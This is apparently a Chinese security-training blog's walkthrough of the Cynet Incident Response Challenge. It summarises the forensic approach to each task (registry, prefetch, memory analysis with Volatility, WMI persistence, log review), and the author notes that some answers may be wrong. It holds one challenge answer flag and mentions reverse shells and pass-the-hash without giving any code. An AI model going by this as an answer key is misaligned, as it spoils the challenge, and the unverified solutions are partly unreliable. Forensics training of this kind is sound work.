Cynet-The Incident Response Challenge 解题过程
PS:仅记录过程,不一定正确
官网:https://incident-response-challenge.com/
1、Time Machine
https://incident-response-challenge.com/challenges/1
题目描述:
StoryGOT Ltd CTO claimed that he found out a suspicious activity on his laptop.
He stated that some of his files suddenly moved from one location to another, when other files seem to be modified on illogical dates. He asked us to check if we can find anomaly indicators which is relevant to his desktop files.
We found out that he was right and there is clear indication of anomaly, using a well-known technique. Try to examine the following $MFT file, focusing the CTO’s Desktop files.
Can you find the anomaly, which is relevant to the time in which file’s changes/modifications have been made, based on the provided $MFT File?
InstructionsSubmit the name of the file that has been found to be affected by the attacker and its original creation time.
The file is located directly on the Desktop.
Time Format: DD-MM-YYYY HH:MM:SS
Filename Format: filename.ext (ext stands for a 3-letter file extension)
wp:用mft2csv打开下载的$MFT文件找到文件即可
2、Hello Dok
https://incident-response-challenge.com/challenges/2
题目描述:
Story
Podrick claims that last Monday (February 3, 2020), at lunch time (around 12:00 PM) a USB device of a malicious entity was plugged into his personal computer. He has also mentioned that he saw one of his colleagues – Theon G, leaving his (Podrick’s) office with the USB in his hand.
Theon claims that he entered the office to visit Aria (who sits in the same office). When he saw Aria was not there, he left the office immediately.
Podrick regularly doesn’t lock his computer and suspects that Theon took advantage of this to steal some of his personal data.
We were invited to examine Podrick’s PC.
Was a USB Device connected to Podrick’s PC on February 3, 2020?
Instructions
Submit the Serial/UID of the suspected USB device
wp:下载的文件是注册表文件,分析 system注册表,找到12:00最近的usb记录
3、Bling-Bling
Story
Lord Varys, director of the finance department in GOT-Research Ltd, found out that certain information about the senior employees’ salaries were leaked and reached other employees of the organization. This financial information is saved on a network shared folder. Permissions to this network folder have been given to Lord Petyr Baelish, and 2 former employees: John Snow, and Daenerys Targaryen. Both John and Daenerys work as external consultants to GOT and aren’t part of the finance department anymore.
Their permissions to the finance shared folders haven’t been revoked yet. Petyr Baelish, John, and Daenerys were never in a good relationship, and Varys suspects them as the cause of the leak. He assumes that one of them wanted to hurt his name and make people think that he leaked the information.
GOT-Research CEO asked John and Daenerys about the mentioned event, when both claimed that they didn’t access the finance folder for almost a year (since leaving the finance department).
Important Information:
To examine if John or Daenerys have accessed the financial data, which includes that Management-Salaries.xlsx file that contains the data which has been leaked.
GOT invited us to investigate the Consultants’ PC.
Instructions
Submit the main suspect’s first name + filename of the suspicious finance file, found on the suspect's host.
Filename Format:File-Name.ext
wp:下载下来的文件是Jumplist记录文件,用JumpList Explorer工具分析即可
4、Is that you?
Story
We were asked to come as soon as possible to GOT Ltd. main site in Japan to investigate their Windows Server 2012 R2 – Domain Controller.
The organizational security experts claimed that lately the server has crashed a few times and that other errors have also occurred frequently. Their attempts to find a reasonable explanation have failed and they suspect that malicious activity on this server has been taking place.
To investigate this issue, Podrick, GOT Ltd. VP invited us as DFIR experts.
As the first step in the investigation, before our arrival to Japan, GOT Ltd. , sent us a raw memory dump which has been taken from the Domain Controller at 17:40. The organizational security experts have noticed that the server crashes have occurred each time around 17:45 and tried to get the best raw memory they could for our investigation.
Can you recognize the suspected process in memory?
Instructions
Submit the PID and PPID of the suspected process
PID: 3-4 Decimal Digits value
PPID: 3-4 Decimal Digits value
wp:下载的文件是内存dump文件,直接上Volatility 找进程
5、B4 Catch
Story
Aria, Head of Security and IT at GOT Ltd. noticed some suspicious SIEM alerts. The alerts mentioned a suspicious file named Scvhost.exe which has been recognized on some organizational hosts. Right as she started to examine this issue, the files were deleted from the hosts.
Aria suspects that Scvhost.exe is a malicious file (probably some kind of malware) and that the attacker is currently in the organizational network.
GOT Ltd management wants us to determine if the Scvhost.exe has been executed on the organizational hosts, when the execution occurred, and how it was deleted.
Instructions
Submit the last execution time of the suspicious file + number of executions on the examined host.
Time Format: DD-MM-YYYY HH:MM (no seconds)
wp:Prefetch文件分析
(Prefetch(预读取),从Windows XP开始引入,用来加速应用程序启动过程。Prefetch包含可执行文件的名称、文件时间戳、运行次数、上次执行时间、Hash等。Win7上记录最近128个可执行文件的信息,Win8-10上的最近1024个可执行文件。)
上辅助工具PECmd
https://github.com/EricZimmerman/PECmd
6、Titan
Story
The Master of Whispers has ears everywhere.
The kingdom has decided it is time to do something about it.
We are going from server to server fo find his little birds who keep talking, repeatedly.
This Ubuntu server has been suspected to be compromised.
We need to know the IP of the listener.
Instructions
Submit the IP of the malicious C2
wp:下载了一个ubuntu的磁盘文件,直接找crontab日志和执行记录就行
7、Sports
Story
Sansa went on a trip to The Eyrie.
Upon her return she seems to be feeling unwell. We think she has been infected with a bug.
When she wakes up, she starts coughing up commercials for Anti-Marriage campaigns.
Please look at her profile and see what the issue is.
Instructions
Submit the malicious file executed using the persistence mechanism on the station:
Filename Format: filename.ext (ext stands for a 3 letter file extension)
wp:下载文件C盘文件。里面有hive记录文件,直接上注册表分析软件
找到Run key下的注册表值就好了
8、LNK Files
Story
Someone has been spreading rumors about how much everyone makes in the kingdom. Upon, further investigation we found that the salaries file accidently had its permissions set to everyone.
Sansa believes that someone is Littlefinger.
We need to find evidence that he had accessed the salaries file.
This way we can finally have leverage against him.
Instructions
Submit the flag located in the same artifact source as the evidence against Littlefinger:
wp:找LNK文件 :关键字:salaries,找到一个连接到共享的文件/或者分析jumplist也可以
二、Medium部分
1、Can’t touch this
Story
Podrick was satisfied from our first investigation, in which we proved that Theon has probably plugged his USB device to Podrick’s PC when he was away.
As we remember, we proved that someone (Theon) plugged a USB device to Podrick’s PC on February 3, 2020 – around 12 PM (12:15-12:45 PM according to our findings of Suspicious USB usage – Hello DOK).
Podrick claims that some of his files/directories have changed, he thinks that the changes have also made by Theon on his first access to his machine which we have already proved as probably happened. He wants us to find out which files were changed/touched by Theon, focusing on the Projects folder which according to Podrick has been completely emptied.
We said that we would do our best and continue with our investigation, to find which files have been watched/copied by Theon.
Instructions
Submit the time in which the “Projects” folder was recreated by Theon.
Note: it is recommended you solve Challenge No.2 before starting this challenge.
Time Format: HH:MM:SS
wp:Hello DoK的升级版,要先完成这个才行。
下载的文件里面有一堆日志文件和Hive文件,分析了很久的日志文件未果,最后发现下载的文件夹名字有提示shellbag
然后用shellbag分析工具加载hive文件就可以找到了。
2、Copy PaSTe
Story
Theon, one of GOT Ltd. Employees has been fired due to many disciplinary issues.
Theon was a member of the Help-Desk team and supported the company employees on the following aspects:
Computing hardware problems
Software installations
Email support
Theon’s hearing before dismissal took place on February 5, 2020. And he was officially fired on February 8, 2020.
Right after Theon’s dismissal, some private emails of GOT’s CEO (John Snow) and VP (Daenerys) has been published.
Theon claims that he has nothing to do with that.
Varys, Theon former boss, claims that Theon didn’t have any access to the CEO’s and VP’s emails. But he also suggested to give us Theon’s PC which hasn’t yet been formatted for us to investigate.
Varys already checked Theon’s Desktop and said that it’s totally empty, which means that Theon has probably moved/deleted some files.
Can you find the specific file that has been deleted/moved which can indicate that Theon had access to John’s (CEO) E-Mail data?
Instructions
Submit the name of the moved/deleted file that can indicate Theon had access to John’s E-Mail data.
Filename Format: filename.ext
wp:下载的文件有这些
找工具分析一下
3、WhoaMI
Story
The SOC analysts of the GOT organization reported that they have found some anomalies. The analysts assume that the attacker still exists on the organization but can’t find any backdoor signs.
They asked us for help and sent us the disk image copy to investigate.
The head of the SOC team stated that according to his observation there has been massive PowerShell and CMD usage throughout the organization, including in hosts which are not being used by technical employees.
One of the most suspicious hosts is Lady Brienne’s host. Brienne (GOT's accountant) stated that she has never used PowerShell or CMD, while the SOC team stated that her machine is probably the “noisiest” in the last few days.
Can you find the backdoor technique which has being used by the attacker on Lady Brienne’s PC?
Instructions
Submit the full path of the file executed by the persistence mechanism.
Full path Format: C:\path\to\malicious\file.ext
wp:wmi取证
用strings查看OBJECTS.DATA 文件 搜索 powershell.exe关键字
参考:https%3A%2F%2Fwww.fireeye.com%2Fcontent%2Fdam%2Ffireeye-www%2Fglobal%2Fen%2Fcurrent-threats%2Fpdfs%2Fwp-windows-management-instrumentation.pdf
http%3A%2F%2Findex-of.es%2FForensic%2FDEFCON-23-WMI-Attacks-Defense-Forensics.pdf
4、Kiwi
Story
Jaime, known as the King-Slayer is head of HR in GOT Ltd. He recognized, or at least thinks that he recognized, some suspicious activity on his PC.
Yesterday – February 8, 2020, around 15:00, he recognized a file with a kiwi logo appeared on his desktop. According to him, the file suddenly disappeared not long after its first appearance on his desktop. Later that day, he started getting messages saying he needs to re-activate Windows Defender. He activated Windows Defender and got the same message again a few hours later.
King-Slayer decided to tell this to his friend in the IT department – Chris. When Chris heard the story, he reported it immediately to the Cyber Security department of GOT Ltd.
The organization’s CISO didn’t want to waste time and called us right away.
GOT Ltd main office is in Switzerland. The CISO sent us all the event logs from King-Slayer’s PC and from the Domain Controller.
Can you help us to find the relevant anomaly?
Jaime’s user account (KingSlayer) is Local Admin on his host.
Domain Name -> GOT.Com
DC Server name -> WIN-IL7M7CC6UVU
Jaime (King Slayer) host -> DESKTOP-HUB666E (172.16.44.135)
Instructions
Submit the domain user account which the attacker used (other than King-Slayer) and the IP Address of the host which he accessed to using this user account.
wp:域取证。日志审计,哈希传递攻击
审核Security.evtx日志文件
5、Seashell
Seashell
Story
The great web server has been showing signs of weird activity lately.
Some weird cronjobs have been created and there has been some unexpected outgoing traffic.
We think maybe someone has gained access to the server.
The cronjobs were created using a web-server user. We suspect someone managed to create a backdoor using the website itself.
Instructions
Find the flag in the reverse shell.
wp:下载的文件是 pfsense防火墙里面的文件。Linux系统,关键词提示:webshell 、爬虫
根据提示信息,直接搜索所有字符串,找到反向shell。搜索bash关键字就行了
6、Sneak
StoryThe Army of the North believes it might have a spy amongst them.
They have clear indication that the enemy anticipates their movement.
We must find the suspicious process that keeps sending data outside.
InstructionsFind the suspicious process name.
Process Name Format: Process.exe
wp:下载的文件是内存dump文件
volatility取证试试,找可疑进程
不能扫到镜像信息,只能手动指定profile,最后确定是 windows 10 x64 15063 版本
7、Universal
Story
We have been getting reports from a concerned user about unusual behavior on his workstation. CMD windows occasionally popup, and sometimes the station is reset.
The behavior seems to persist after these restarts.
We believe some malicious software has implemented a persistence mechanism, but our team has not been able to find it so far.
Instructions
Submit the persistent process
Process Name Format: Process.exe
wp: 关键提示:GlobalFlag
用registry explorer 找注册表项目,搜 GlobalFlag注册表key 就行了
参考:Image File Execution Options Injection, Technique T1183 - Enterprise | MITRE ATT&CK® https://attack.mitre.org/techniques/T1183/
8、Notes
Story
An attacker has gained access to Littlefinger’s session on his computer.
He has successfully connected to Kings Landing (DC) using the GOT\varys-adm of the IT team Domain Admin account credentials.
It is yet unclear how he found those credentials.
We suspect it to be the entry point of the attacker to the whole organization.
Instructions
Submit the Varys-adm user password.
wp:关键提示:BMChache
找到 rdp bitmap cache 文件
找工具解析 找到密码
9、Psss
Story
Same old story.
The master of whispers has ears everywhere.
Cersei is paranoid…
We have another station which might be compromised.
Help us find the IP of the listening C2 server.
Instructions
Submit the IP of the reverse shell server.
下载的文件是vhdx镜像 ,挂载它,恢复日志文件
找到powershell执行记录
关键提示:Powershell
10、Roots
StoryWe have found the following pdf running around our infrastructure.
It clearly has legs.
We believe the attacker has hidden a password to one of his services in the code and we need that password.
Instructions
In the PDF there is a word file and in the word file there is a macro that contains the flag in ascii.
wp:根据提示需要分析恶意pdf文件,pdf文件中包含word文件,找到word宏
用kali的 pdf-Parser试试
找到里面有代码从GitHub下载一个powershell脚本 找到这个脚本找到密码
FlaG_[W0N-C0NGr@T5]
三、Advanced部分
1、2nd Base
StoryOnce again, we have found ourselves with some malware running amuck our peasants.
However, this time we have made an image of a clean machine. Use it to compare the infected machine with the clean machine. Maybe it could help?
What is the malicious process?
Instructions
Submit the name and PID of the malicious process.
Process Name Format: ProcessName.exe
wp:下载文件包括两个内存镜像,比对一下
先分析Baseline镜像的进程
再看看另外一个有恶意进程的镜像里面的进程
值得怀疑的进程
2、Meow
Story
We have met quite an advanced adversary.
Multiple accounts have been compromised on the network.
We think an attacker gained access to the DC and harvested the credentials.
We have imaged the domain controller and we think there should be some leftovers which can indicate which relevant tool has been used by the attacker. Can you find them?
Instructions
Submit the tool's name, which has been used by the attacker
Filename Format: FILE.EXT (ext stands for a 3-letter file extension)
wp:DC取证
找一个恶意工具的名字和路径
FTK挂载镜像,然后数据恢复
3、Sad
Story
There is a station infected with ransomware (desktop-hub666e).
This station has some very valuable files. All of our transactions with the Iron Bank are kept there.
We have captured a PCAP and a memory dump of the station for some analysis.
We can't afford to pay the current ransom. We need the data inside that encrypted file.
Instructions
Submit the data in the encrypted file.
wp:感染了勒索软件,取证 pcap和内存转储
关键提示:WananCry
ps:没有做出来
4、Insurance
Story
The user Robert had his wallpaper changed to a life insurance ad.
Robert says he did not do it. We assume someone connected to his machine and did so!
We have no idea how the insurance wallpaper got to the station. Any help?
Instructions
Submit the time stamp of the lateral movement technique used:
Timestamp: YYYY-MM-DD HH:MM (no seconds)
wp:下载了一个vhdx镜像,关键词 PsEXEC
加载镜像
直接复制的日志不能用,要数据恢复,然后把日志复制出来看
看logon的日志 找psexec关键字
PS:不知道有没有做对。
5、Layers
Story
We had an attacker on the network, we think we flushed him out, but we think there are still some other stations he had infected or had access to.
We ran Autoruns using Kansa on the stations, and saved each station's output on the following format: -Autorunsc.csv. hopefully we can see if any station looks suspicious.
Instructions
Submit the most suspected computer name + name of suspicious artifact(filename).
Filename Format: filename.ext (ext stands for a 3-letter file extension)
wp:关键词:Kansa Stacking
Kansa监控记录分析。
PS:不确定是否做对了
6、Frog Find
Story
Classic case. We have a frog running loose and its running havoc.
We have clear indication of malicious outgoing traffic to a host on the digital ocean.
We can’t seem to find the malicious process on the system.
We know there is a frog hidden in the malicious executable.
Find the process, extract the frog.
Instructions
Find the flag inside the malicious process.
wp:关键词:Process Hollowing
下载内存镜像 直接上Volatility分析一下
可疑进程
dump出来
7、DB
Story
WAF logs show an unusual spike in SQL Injection attempts on our domain Westeros.GOT.com in the last days (since 4.2.2020).
We are afraid an attacker might have been able to access the server using the SQL Injection.
Please make sure whether the attacker was able or not to successfully use the SQL injection to gain access to the server.
If he did, what is the time he did so?
Instructions
Submit the time when the attacker gained access to the OS.
Time format: YYYY-MM-DD HH:MM (no seconds)
wp:服务器被SQL注入了。
找到执行时间 2020年2月4日之后,找获得系统访问权限的时间
下载的vhdx文件,找windows security 日志
找到了两个时间 2020-02-04 23:56 和 2020-02-05 00:07
PS:提交了第一个好像错了
最终得分:
最终排名
说明
本文由合天网安实验室原创,转载请注明来源。
关于合天网安实验室
合天网安实验室(www.hetianlab.com)-国内领先的实操型网络安全在线教育平台
真实环境,在线实操学网络安全 ;实验内容涵盖:系统安全,软件安全,网络安全,Web安全,移动安全,CTF,取证分析,渗透测试,网安意识教育等。
合天网安取证分析课程:http://s.htlabs.vip/foa
合天网安取证分析挑战课程:http://s.htlabs.vip/foc
